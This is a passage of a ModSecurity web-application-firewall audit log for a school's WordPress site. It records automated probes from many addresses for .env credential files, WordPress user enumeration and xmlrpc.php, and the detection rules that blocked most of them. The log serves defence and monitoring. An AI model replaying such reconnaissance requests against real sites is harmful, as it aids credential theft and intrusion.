[line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746331658770151 5765 (- - -) Stopwatch2: 1746331658770151 5765; combined=4270, p1=549, p2=3498, p3=32, p4=35, p5=93, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8d82c12-Z-- --9515cf69-A-- [04/May/2025:11:10:01 +0700] aBbomfnZiHJYHUAF8QfcVQAAAAM 103.236.140.4 36740 103.236.140.4 8181 --9515cf69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9515cf69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9515cf69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746331801686229 2179 (- - -) Stopwatch2: 1746331801686229 2179; combined=897, p1=329, p2=545, p3=0, p4=0, p5=22, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9515cf69-Z-- --8fbfe56c-A-- [04/May/2025:11:10:08 +0700] aBbooPnZiHJYHUAF8QfcVgAAABQ 103.236.140.4 36744 103.236.140.4 8181 --8fbfe56c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8fbfe56c-C-- demo.sayHello --8fbfe56c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fbfe56c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746331808011253 6072 (- - -) Stopwatch2: 1746331808011253 6072; combined=4435, p1=552, p2=3657, p3=32, p4=36, p5=94, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fbfe56c-Z-- --00230e38-A-- [04/May/2025:11:17:49 +0700] aBbqbfnZiHJYHUAF8QfcagAAAAs 103.236.140.4 36826 103.236.140.4 8181 --00230e38-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.189.225.181 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.189.225.181 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --00230e38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00230e38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746332269516626 756 (- - -) Stopwatch2: 1746332269516626 756; combined=299, p1=261, p2=0, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00230e38-Z-- --2ec31b01-A-- [04/May/2025:11:22:36 +0700] aBbrjPnZiHJYHUAF8QfccQAAABU 103.236.140.4 36844 103.236.140.4 8181 --2ec31b01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ec31b01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ec31b01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746332556959188 2909 (- - -) Stopwatch2: 1746332556959188 2909; combined=1253, p1=431, p2=793, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ec31b01-Z-- --fdf57474-A-- [04/May/2025:11:22:45 +0700] aBbrlWJEE9ao5dcyYWnvIwAAAJU 103.236.140.4 36848 103.236.140.4 8181 --fdf57474-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fdf57474-C-- demo.sayHello --fdf57474-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdf57474-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746332565078594 5727 (- - -) Stopwatch2: 1746332565078594 5727; combined=4156, p1=555, p2=3381, p3=32, p4=36, p5=91, sr=79, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdf57474-Z-- --29998a1e-A-- [04/May/2025:11:31:32 +0700] aBbtpNsVQyl9V2B8Pt-xBwAAAEw 103.236.140.4 36958 103.236.140.4 8181 --29998a1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile Accept-Charset: utf-8 --29998a1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29998a1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746333092717539 815 (- - -) Stopwatch2: 1746333092717539 815; combined=331, p1=290, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29998a1e-Z-- --a3973066-A-- [04/May/2025:11:35:54 +0700] aBbuqvnZiHJYHUAF8Qfc1QAAAAk 103.236.140.4 37208 103.236.140.4 8181 --a3973066-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; Lenovo K8 Note) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --a3973066-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3973066-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746333354715874 807 (- - -) Stopwatch2: 1746333354715874 807; combined=327, p1=287, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3973066-Z-- --6b1a2f53-A-- [04/May/2025:11:35:55 +0700] aBbuq_nZiHJYHUAF8Qfc1gAAAAo 103.236.140.4 37210 103.236.140.4 8181 --6b1a2f53-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6b1a2f53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b1a2f53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746333355110307 2905 (- - -) Stopwatch2: 1746333355110307 2905; combined=1227, p1=404, p2=786, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b1a2f53-Z-- --3dff817d-A-- [04/May/2025:11:36:01 +0700] aBbusechPF6irSergtv9jgAAANg 103.236.140.4 37214 103.236.140.4 8181 --3dff817d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3dff817d-C-- demo.sayHello --3dff817d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dff817d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746333361045742 5344 (- - -) Stopwatch2: 1746333361045742 5344; combined=3716, p1=566, p2=2958, p3=26, p4=31, p5=80, sr=106, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dff817d-Z-- --0ee4ec1d-A-- [04/May/2025:11:36:09 +0700] aBbuufnZiHJYHUAF8Qfc2QAAAA0 103.236.140.4 37218 103.236.140.4 8181 --0ee4ec1d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0ee4ec1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ee4ec1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746333369300164 2380 (- - -) Stopwatch2: 1746333369300164 2380; combined=1051, p1=356, p2=664, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ee4ec1d-Z-- --194fea5a-A-- [04/May/2025:11:36:17 +0700] aBbuwfnZiHJYHUAF8Qfc2wAAABA 103.236.140.4 37222 103.236.140.4 8181 --194fea5a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.219 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --194fea5a-C-- demo.sayHello --194fea5a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --194fea5a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746333377334254 5218 (- - -) Stopwatch2: 1746333377334254 5218; combined=3911, p1=451, p2=3242, p3=25, p4=28, p5=96, sr=67, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --194fea5a-Z-- --bb8de10d-A-- [04/May/2025:11:41:20 +0700] aBbv8NsVQyl9V2B8Pt-xFgAAAEI 103.236.140.4 37242 103.236.140.4 8181 --bb8de10d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb8de10d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb8de10d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746333680540861 3146 (- - -) Stopwatch2: 1746333680540861 3146; combined=1368, p1=461, p2=877, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb8de10d-Z-- --dc379650-A-- [04/May/2025:11:41:25 +0700] aBbv9fnZiHJYHUAF8Qfc4QAAAAc 103.236.140.4 37246 103.236.140.4 8181 --dc379650-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc379650-C-- demo.sayHello --dc379650-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc379650-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746333685248676 4952 (- - -) Stopwatch2: 1746333685248676 4952; combined=3888, p1=450, p2=3229, p3=28, p4=31, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc379650-Z-- --abb1e547-A-- [04/May/2025:11:43:07 +0700] aBbwW_nZiHJYHUAF8Qfc5QAAAAs 103.236.140.4 37258 103.236.140.4 8181 --abb1e547-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 Accept-Charset: utf-8 --abb1e547-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abb1e547-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746333787185160 804 (- - -) Stopwatch2: 1746333787185160 804; combined=332, p1=298, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abb1e547-Z-- --62386a01-A-- [04/May/2025:11:48:08 +0700] aBbxiGJEE9ao5dcyYWnvLQAAAJA 103.236.140.4 37282 103.236.140.4 8181 --62386a01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --62386a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62386a01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746334088454957 3220 (- - -) Stopwatch2: 1746334088454957 3220; combined=1425, p1=492, p2=900, p3=0, p4=0, p5=33, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62386a01-Z-- --1d4d6b0a-A-- [04/May/2025:11:48:15 +0700] aBbxj_nZiHJYHUAF8Qfc6QAAABA 103.236.140.4 37286 103.236.140.4 8181 --1d4d6b0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1d4d6b0a-C-- demo.sayHello --1d4d6b0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d4d6b0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746334095758168 5086 (- - -) Stopwatch2: 1746334095758168 5086; combined=3835, p1=469, p2=3182, p3=19, p4=22, p5=83, sr=68, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d4d6b0a-Z-- --4446ea51-A-- [04/May/2025:12:04:15 +0700] aBb1T_nZiHJYHUAF8Qfc9wAAABY 103.236.140.4 37376 103.236.140.4 8181 --4446ea51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4446ea51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4446ea51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746335055147769 2895 (- - -) Stopwatch2: 1746335055147769 2895; combined=1259, p1=462, p2=767, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4446ea51-Z-- --6a98aa6b-A-- [04/May/2025:12:04:22 +0700] aBb1VtsVQyl9V2B8Pt-xHwAAAFc 103.236.140.4 37380 103.236.140.4 8181 --6a98aa6b-B-- POST 